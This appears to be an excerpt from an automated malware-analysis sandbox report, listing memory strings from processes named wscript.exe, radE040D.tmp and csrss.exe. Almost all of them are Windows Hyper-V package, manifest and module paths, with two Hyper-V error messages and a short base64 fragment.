Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b\
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..ommon-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_f5e4ea96fd9fee6d.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\nvspinfo.exell
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_usbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_4070b1e28eb5028d\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_tsgenericusbdriver.inf_31bf3856ad364e35_10.0.17134.1_none_ca286e9e3a6bdb60\amd64_dual_rdcameradriver.inf_31bf3856ad364e35_10.0.17134.1_none_2ca8891b3aeaacbd\amd64_dual_wmbclass_wmc_union.inf_31bf3856ad364e35_10.0.17134.1_none_f0e56a6391b6ebc2\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\970amd64_dual_wudfusbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_3acf25bb0f3d80b9\amd64_dual_tsusbhubfilter.inf_31bf3856ad364e35_10.0.17134.1_none_8abfd8e8cc7b9e4c\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_shutdown.inf_31bf3856ad364e35_10.0.17134.1_none_36194d50cbafa987\amd64_dual_wvmic_kvpexchange.inf_31bf3856ad364e35_10.0.17134.1_none_3386da29bb1b0b2f\amd64_e2xw10x64.inf
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177.manifest
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat2~2
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa.manifest
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004.manifest7
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\RemoteFileBrowse.dl,
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat`
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096.manifest]
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1at.1
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.catp
Source: radE040D.tmp, 00000004.00000003.7127160132.000000000310D000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.catnvI
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096\
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumV~
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1mA
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_7fb4b9d31b9d09e8.manifest
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catcat
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\VmsProxyHNic.sysi
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7\
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catT
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..group-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_88bd3c16c482b637.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df\`
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a\
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7.manifestHV
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73\vmsynth3dvideo.dll.muiN
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.cat/
Source: radE040D.tmp, 00000004.00000003.7131622681.0000000003178000.00000004.sdmpBinary or memory string: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt.cat
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73.manifest
Source: radE040D.tmp, 00000004.00000002.8062573216.0000000003FBE000.00000004.sdmpBinary or memory string: VwsuEoyeix9nBff1PrdwzfLTAJjzRtwmrJlLCertvSI+T8uVmciRAgMBAAE=
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack_31bf3856ad364e35_10.0.17134.1_none_4a3dff595d47ce04.manifestest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ers-vmswitch-common_31bf3856ad364e35_10.0.17134.1_none_156e07c0687fe777.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004\P
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumt
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat4.1
Source: csrss.exe, 00000005.00000002.6845367603.00000000038C6000.00000004.sdmpBinary or memory string: CimCmdletspsd1Hyper-V.psd1
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmpBinary or memory string: Hyper-V.Types
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1N
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cati
Source: radE040D.tmp, 00000004.00000003.7082846453.000000000387B000.00000004.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1sm1
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumZ|
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat*W
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.muma]
Source: csrss.exe, 00000005.00000002.6845164829.00000000038A5000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.17134.1_none_9cb6bf37d3c2efb9\Hyper-V.Format.ps1xml.mof
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6\7\\
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catf6f
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catfig
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964\
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmpBinary or memory string: Hyper-V.psd1d1MsDtc.psd1nk1TestDtc.psd1
Source: radE040D.tmp, 00000004.00000003.6832603675.0000000003A84000.00000004.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_10.0.17134.1_none_8c46edec6c2bc4c5.manifest
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b\amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\amd64_microsoft-hyper-v-drivers-hy
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.cat
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum*I
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..vices-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_d43b74ba5db8d712.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975.manifest
Source: radE040D.tmp, 00000004.00000003.7169001015.0000000003118000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumm
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumc~
Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumat}\(
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum.cat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.48_none_cf157924edc24a05.manifest
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmpBinary or memory string: Hyper-V.psd11Hyper-V.psd1
Source: radE040D.tmp, 00000004.00000003.7169001015.0000000003118000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.17134.1_en-us_c011eec82bd47853.manifestu
Source: radE040D.tmp, 00000004.00000003.7082846453.000000000387B000.00000004.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.Format.ps1xmlxmlls1xmll
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac\9177amd64_hyperv-commandline-tool.resources_31bf3856ad364e35_10.0.17134.1_en-us_d5c4e754bc26201d\amd64_hyperv-networking-switch-interface_31bf3856ad364e35_10.0.17134.1_none_cbcae0f157b5d02b\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.137_none_6f3c182768f074fa\amd64_ialpss2i_i2c_bxt_p.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_ffa8f5f4e6504efb\amd64_hyperv-compute-eventlog.resources_31bf3856ad364e35_10.0.17134.1_en-us_522940f2f04f07f9\amd64_hyperv-vmemulateddevices.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1a750046421bf96\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bcfb31102e62eb\4faamd64_hyperv-worker-events.resources_31bf3856ad364e35_10.0.17134.1_en-us_9de5622f209a7b21\eamd64_halextintclpiodma.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_24bb2a71e75700a1\amd64_hyperv-vpci-rootporterr.resources_31bf3856ad364e35_10.0.17134.1_en-us_30ee0a3c7e36caae\3amd
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05\
Source: radE040D.tmp, 00000004.00000003.7168740992.0000000003103000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1um1
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mummumr
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1t
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_ca9236a4769cd0cd.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vid_31bf3856ad364e35_10.0.17134.1_none_864a29a4e381d095.manifestest
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1t
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b.manifestt
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storvsp_31bf3856ad364e35_10.0.17134.1_none_fabc5147bcc71691.manifest
Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cattat
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum\
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumw
Source: radE040D.tmp, 00000004.00000003.7131427612.0000000003182000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum\*iE
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9\
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catHy
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catat
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: radE040D.tmp, 00000004.00000003.7130318718.000000000311F000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catdC
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5\virtmgmt.mscmui
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat&
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05\
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73;
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.1.mum
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat34.1s
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.81_none_0a34114fff806d3f\Z
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-guest-network-drivers_31bf3856ad364e35_10.0.17134.1_none_5c8a4254832126cf.manifestB
Source: radE040D.tmp, 00000004.00000003.7130780479.0000000003129000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.11
